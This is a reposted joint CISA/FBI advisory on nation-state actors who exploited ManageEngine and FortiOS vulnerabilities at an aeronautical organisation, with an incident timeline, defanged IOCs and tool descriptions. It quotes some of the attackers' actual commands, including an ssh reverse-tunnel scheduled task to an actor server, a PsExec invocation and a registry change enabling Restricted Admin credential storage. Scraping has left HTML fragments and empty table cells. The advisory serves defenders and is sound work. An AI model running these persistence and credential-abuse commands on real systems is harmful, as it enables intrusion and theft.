US-CERT- Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

Started by Netwörkheäd, September 07, 2023, 12:02:44 PM

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Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475



The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited" title="CVE-2022-47966">CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting" title="CVE-2022-42475">CVE-2022-42475 to establish presence on the organization's firewall device.

CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

" class="c-file__link" target="_blank">AA23-250A Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
    (PDF,       685.14 KB


For a downloadable copy of IOCs, see:

" class="c-file__link" target="_blank">AA23-250A STIX XML
    (XML,       69.24 KB


For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:

" class="c-file__link" target="_blank">MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
    (PDF,       385.49 KB


Note: This advisory uses the" title="Enterprise Matrix">MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors' activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.


By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization's network via at least two initial access vectors:

  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.

  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization's firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.

APT Actor Activity

Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [" title="Exploit Public-Facing Application">T1190] for initial access to the organization's web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.

Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [" title="Create Account: Local Account">T1136.001] named Azure with administrative privileges [" title="Exploitation for Privilege Escalation">T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization's network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.

Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization's firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [" title="Valid Accounts: Local Accounts">T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.

Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [" title="Indicator Removal: Clear Windows Event Logs">T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.

APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [">T1573.002] on Transmission Control Protocol (TCP) port 10443 [">T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:

  • 144.202.2[.]71

  • 207.246.105[.]240

  • 45.77.121[.]232

  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx

  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx

  • c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx

  • c:\inetpub\passwordchange\0LECPNJYRH.aspx

  • c:\inetpub\passwordchange\9ehj.aspx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx

  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx

  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:

  • 45.90.123[.]194

  • 154.6.91[.]26

  • 154.6.93[.]22

  • 154.6.93[.]5

  • 154.6.93[.]12

  • 154.6.93[.]32

  • 154.6.93[.]24

  • 184.170.241[.]27

  • 191.96.106[.]40

  • 102.129.145[.]232

Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

Table 1: Timeline of APT Actor Activity

Timestamp (UTC)





Hello World User-Agent string observed in 44 total events.

Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi

Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization's web server and malicious command and control (C2) server IP 92.118.39[.]82 [" title="Application Layer Protocol: Web Protocols">T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [" title="Acquire Infrastructure: Botnet">T1583.005].[" title="SID 1:58992">1]


Attempts made to export three files; associated with malicious IP 192.142.226[.]153.

APT actors attempted to export [" title="Collection">TA0009], [" title="Exfiltration">TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [" title="Masquerading: Masquerade File Type">T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:

  • (09:06:37 UTC)\

  • wo_view_bg1.gif (09:08:11 UTC)

  • wo_view_bg2.gif (09:19:43 UTC)

Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.



Successful web server exploitation via CVE-2022-47966.

Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.



Azure local user account with administrative permissions created.

A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.



LSASS dumped by Azure user.

The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [" title="OS Credential Dumping: LSASS Memory">T1003.001].

Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.



Mimikatz.exe downloaded via ConnectWise ScreenConnect.

The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [" title="Remote Access Software">T1219], [" title="Obtain Capabilities: Tool">T1588.002].

Note: ConnectWise ScreenConnect was observed in multiple locations within the organization's environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.



Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.

Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [" title="Obfuscated Files or Information: Embedded Payloads">T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).

See MAR-10430311-1.v1 for additional details.



Mimikatz credential dump files created.

Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [" title="OS Credential Dumping">T1003].



Legitimate files/applications nmap.exe and npcap.exe downloaded.

Azure user account downloaded nmap.exe [" title="Remote System Discovery">T1018] and npcap.exe [" title="Network Sniffing">T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.

Note: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.


13:56:14 downloaded by the Azure user account.

APT actors downloaded the file via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:

  • install-sshd.ps1 (script)

  • psexec.exe

  • sshd.exe

  • ssh.exe

  • ssh-sk-helper.exe

  • libcrypto.dll

Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [" title="External Remote Services">T1133] and is detailed in the scheduled task below.



SSH tools downloaded to establish reverse (remote) communication.

Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:

  • c:\windows\system32\ssh-shellhost.exe

  • c:\windows\system32\ssh-agent.exe

  • c:\windows\system32\ssh-add.exe

While the files were not identified as malicious, they were loaded for malicious purposes.



license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.

license validf scheduled task [" title="Masquerading: Masquerade Task or Service">T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [" title="Scheduled Task/Job: Scheduled Task">T1053.005]:

c:\Windows\System32\ssh.exe -N -f -R 12100 sst@ -p 443 -o StrictHostKeyChecking=no



PsExec executed on the ServiceDesk system.

Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.

APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.

psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc

powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Note: PsExec, a command line utility from Microsoft's Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.



ProcDump created on the ServiceDesk system.

ProcDump was created within the c:\windows\system32\prc64.exe directory. This was later identified as a method for enumerating running processes/applications [" title="Process Discovery">T1057] and dumping LSASS credentials.



Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.

Ngrok was used to establish an RDP connection [" title="Remote Services: Remote Desktop Protocol">T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.

At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.

Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.



Apache Log4j exploit attempted against the ServiceDesk system.

APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:

  • 80.85.241[.]15

  • 68.177.56[.]38

  • main.cloudfronts[.]net



Mimikatz credential dump files created.

One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

Note: This is a different path and time associated with Mimikatz than listed above.


HTTP-GET requests sent to C2 IP 92.118.39[.]82.

The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.



Resource.aspx web shell detected.

Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [" title="Command and Scripting Interpreter: JavaScript">T1059.007] on the OWA server [" title="Server Software Component: Web Shell">T1505.003]:

  • c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx

Note: The administrative user's credentials were obtained from the APT actors' collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.

See MAR-10430311-1.v1 for additional details.



Metasploit service installed.

APT actors installed Metasploit with the following attributes on the organization's domain controller [">T1059.001]:

Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.



ConfigLogin.aspx web shell detected.

APT actors dropped an additional ASPX web shell on a web server in the following file system location:

  • c:\inetpub\wwwrot\uninet\css\font-awesome\css\ConfigLogin.aspx

See MAR-10430311-1.v1 for additional details.



wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.

APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [" title="Develop Capabilities: Malware">T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.

See MAR-10430311-1.v1 for additional details.







Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.

PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:

  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)

  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)



APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the domain, which indicated the server was susceptible to a DNS-style attack [">T1046].

Destination IP: 103.105.49[.]108

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.

Table 2: Observed Tools Used by APT Actors




Mimikatz [" title="Mimikatz">2]

A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:

These files were dumped to obtain registry information such as users on the system, data used by the operating system [" title="Query Registry">T1012], and installed programs.

Ngrok [" title="Ngrok">3]

Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.

In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[" title="Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester">4],[" title="#StopRansomware: Daixin Team">5],[" title="#StopRansomware: LockBit 3.0">6]

Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems [" title="Protocol Tunneling">T1572].

Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok's ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.


A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.

APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.


Metasploit is an open-source penetration testing software.

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